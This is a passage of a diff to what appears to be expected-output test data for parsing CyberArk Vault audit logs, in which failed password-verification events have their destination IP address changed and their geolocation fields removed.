Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615820651\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615820651\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -451,11 +407,11 @@ "retries_count": "1", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615820651", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -468,9 +424,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493907200Z", - "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193614100Z", + "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -493,22 +449,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -531,7 +476,7 @@ }, "@timestamp": "2021-03-15T16:35:01.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -543,28 +488,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T16:35:01Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615826099\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615826099\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "2", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -573,11 +518,11 @@ "retries_count": "2", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615826099", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -590,9 +535,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493909500Z", - "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n 